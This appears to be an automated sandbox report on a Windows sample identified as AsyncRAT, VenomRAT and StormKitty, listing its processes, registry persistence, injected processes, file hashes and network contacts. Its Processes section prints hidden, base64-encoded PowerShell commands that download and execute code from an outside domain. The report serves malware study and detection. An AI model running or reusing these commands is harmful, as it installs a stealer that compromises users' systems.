Malware Analysis Report

2024-12-08 02:25

Sample ID 241117-stzy6asgme
Target fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
SHA256 fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
Tags
asyncrat stormkitty venomrat discovery execution persistence rat stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c

Threat Level: Known bad

The file fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c was found to be: Known bad.

Malicious Activity Summary

asyncrat stormkitty venomrat discovery execution persistence rat stealer

Venomrat family

VenomRAT

AsyncRat

Asyncrat family

StormKitty

Stormkitty family

StormKitty payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-17 15:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-17 15:25

Reported

2024-11-17 15:28

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A

Venomrat family

venomrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe N/A
N/A N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Edgeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Edgeservices\" \"C:\\Users\\Public\\Downloads\\Edgeservices\\Edgeservices.exe\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Chromeservices\" \"C:\\Users\\Public\\Downloads\\Chromeservices\\Chromeservices.exe\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 34 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 35 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 36 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 34 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 35 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 36 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4116 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 4116 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 4520 wrote to memory of 1088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4520 wrote to memory of 1088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
PID 1088 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4116 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 4116 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 1776 wrote to memory of 4356 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 4356 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4356 wrote to memory of 380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe
PID 4356 wrote to memory of 380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe

"C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c sora.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=

C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe

"C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c sorast.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwBzAHQALgB0AHgAdAAnACkA

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2480 -ip 2480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1316

C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe

"C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 openaisoralab.com udp
US 172.67.205.71:443 openaisoralab.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.205.67.172.in-addr.arpa udp
US 172.67.205.71:443 openaisoralab.com tcp
US 8.8.8.8:53 jobdigitalmarketing.xyz udp
US 8.8.8.8:53 thicktoys.sbs udp
US 8.8.8.8:53 fleez-inc.sbs udp
US 8.8.8.8:53 pull-trucker.sbs udp
US 8.8.8.8:53 3xc1aimbl0w.sbs udp
US 8.8.8.8:53 bored-light.sbs udp
US 8.8.8.8:53 300snails.sbs udp
US 8.8.8.8:53 faintbl0w.sbs udp
US 8.8.8.8:53 crib-endanger.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat

MD5 345718527c30710326719967e3fd4d50
SHA1 8f7be9c69a4e95155dd33c935f362155d91c05dc
SHA256 ac4db954f2a68c4b12ba72dc4feb193c16b9bdc6a58d9550a9a5fb7383227bd5
SHA512 21bf40922a5fb96239eff6107d394cac3862b2a9068b80949bfe158a420d1588685d005c0d70ed69b7614d393b3f846d1d61e13048e9650a5087367b6f7c54f6

memory/1088-5-0x00007FFEF0AB3000-0x00007FFEF0AB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vusuap0l.q1s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1088-11-0x000001B9F4690000-0x000001B9F46B2000-memory.dmp

memory/1088-16-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

memory/1088-17-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

memory/1088-18-0x000001B9F6F60000-0x000001B9F7122000-memory.dmp

memory/1088-48-0x00007FFEF0AB3000-0x00007FFEF0AB5000-memory.dmp

memory/1088-49-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe

MD5 25ab75a586f4b22ebae81e74b20bfee9
SHA1 97f52704adbbd42f1c6415f565241ba1521c450f
SHA256 14a4044215f341ba1ece3e49d475e309749b65c8959f2724d26209ed705a225a
SHA512 cfa18fcccdeb95450f9ddb24dd620edca3faec765d339395884bcd2369783e37fd41ab3923a2d7439512670eb9389555dfc5a72adb725c818d2a5f4ea5154f7c

C:\Users\Public\Downloads\Edgeservices\MSVCP140.dll

MD5 29c6c243cfb1cec96b4a1008274f9600
SHA1 c54b10ef6305cc3814c68e6c8fd6daecbb27622a
SHA256 44a5af24f8d5f9c50a9e5a200a0486100afb6a0e86377e2e3e622a7bbb57cb04
SHA512 39c34554ea7b6d433c2aecfdeff87959e625e943bf7a446ebca8e5878eaf24198c1b188359a0343fb78478f2bc8b986ca4d0e69d39bac6ff80cb901fe4f113ee

C:\Users\Public\Downloads\Edgeservices\vcruntime140.dll

MD5 02794a29811ba0a78e9687a0010c37ce
SHA1 97b5701d18bd5e25537851614099e2ffce25d6d8
SHA256 1729421a22585823493d5a125cd43a470889b952a2422f48a7bc8193f5c23b0f
SHA512 caf2a478e9c78c8e93dd2288ed98a9261fcf2b7e807df84f2e4d76f8130c2e503eb2470c947a678ac63e59d7d54f74e80e743d635428aa874ec2d06df68d0272

C:\Users\Public\Downloads\Edgeservices\Qt5Core.dll

MD5 d63a867c0a14584dfe04a9712c64bc0b
SHA1 3dc1c8e9ca93962a6d3400be3ac7d76d65f87a01
SHA256 60dbf8cb76cbfc6a1b6df53ea3c087eecba1bf59737a1de2a2b96475f0c912c0
SHA512 aeebf3c911816b0b984bf78a43275575e7e1ddb61473d0bd14504316cf389da0373e78948c0ba3d54146aed95f2569987549b76a1325e0c949e2d16e038c8914

C:\Users\Public\Downloads\Edgeservices\vcruntime140_1.dll

MD5 d8d1a08176ba2542c58669c1c04da1b7
SHA1 e0d0059baf23fb5e1d2dadedc12e2f53c930256d
SHA256 26c29d01df73a8e35d32e430c892d925abb6e4ad62d3630ae42b69daacba1a0d
SHA512 5308790fbcf6348e87e7d5b9235ed66942527326f7ba556c910d68d94617bdd247a4ed540b4b9f8d4e73d15cf4a7204c0a57d4fd348ec26e53f39b91be8617fb

C:\Users\Public\Downloads\Edgeservices\concrt140e.dll

MD5 22c3fc378a3c3311bb5e9082c443fbd4
SHA1 06c32b31de4772da425c1eebc6c8064ed4305843
SHA256 422172e732ebd0892d8e737c07c3a9fead044f6f0d587a2e5991c40783e03ca9
SHA512 4330eb482c2257a1775e1edc10753dc302042266fc012a20007c1706e31c65a67017d7eb63a1eb5e13a84b7638ddf24017c63b71e92dfd30215cc7ab7f878a4b

memory/2480-69-0x0000000000400000-0x000000000064A000-memory.dmp

memory/1088-70-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat

MD5 d80437fda6ba90dd8338ca91fbcc18dc
SHA1 87415b5650b55ff7b2a38684768a49018e42d982
SHA256 81d20d2731ab795995553d20cb60a7481ae4fa27615257418489f802683b435a
SHA512 2ffc42e30f0a63d1b9a563ee9ec346faf26a71d4f9f3a429f35e4d95d446a2dbc6aa2bb43a37d0b8533feb02bd738e5708be49919ad27cc572175d547be07240

memory/2480-72-0x00000000059B0000-0x0000000005F54000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 56c43715e0e7fa58012d8a5769d8d568
SHA1 4370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA256 8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512 b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e9a929a0092fad42a2ddadab08c92cb6
SHA1 4075acd066c1ee6535d2795c1cb2ff105b202760
SHA256 796bb53fc5db0118d175df6f018ff87642b70c0ea7812e3286ae556d0c68821e
SHA512 6b4c1af8b28ede7617a6ae357c4590249a61979baf9e27b4564d2c4c44fd36a163a7c2840e214523b1b9638d10a1257e751c0f95d9520e9dd90a9bc4f91115a8

memory/2480-85-0x0000000005330000-0x0000000005396000-memory.dmp

C:\Users\Public\Downloads\Chromeservices\Qt5Core.dll

MD5 0897cd584a6a8e39b9f2e25a2ab193e2
SHA1 4af09f0291c659d74e4e7f1a7e96632b3987daef
SHA256 8c7cda207cb9031fb126719a43bff6e2fb4b8e2ccffb3efa2b895f6092603b65
SHA512 bfb5663756a8b18a0945e9e654256870f100de50e815dcddb86a2aed06bb85b2e5792e121b4af0560987adc40c5b9e020a5e32e1ddf4dafd29efc2aca9b9a427

C:\Users\Public\Downloads\Chromeservices\concrt140e.dll

MD5 8b0e3a4d5c72ddee5866296bcb2c8185
SHA1 d689fbf9c6fcf957243e0c3f89831cecf69eade3
SHA256 2d585161ec71beeaf8234163341482a06d6ee01856e058518986a59fbddeb11b
SHA512 ca33dccc148b9acdeb1f064d6313101c8bc5daaed04f417b42a30d2bf4788e7d23b8536c0431650fbe5fcf4b44aeab3db478452390f4cb78ea42d731e8a5e198

memory/1640-132-0x0000000000400000-0x0000000000457000-memory.dmp

memory/1640-133-0x0000000000400000-0x0000000000457000-memory.dmp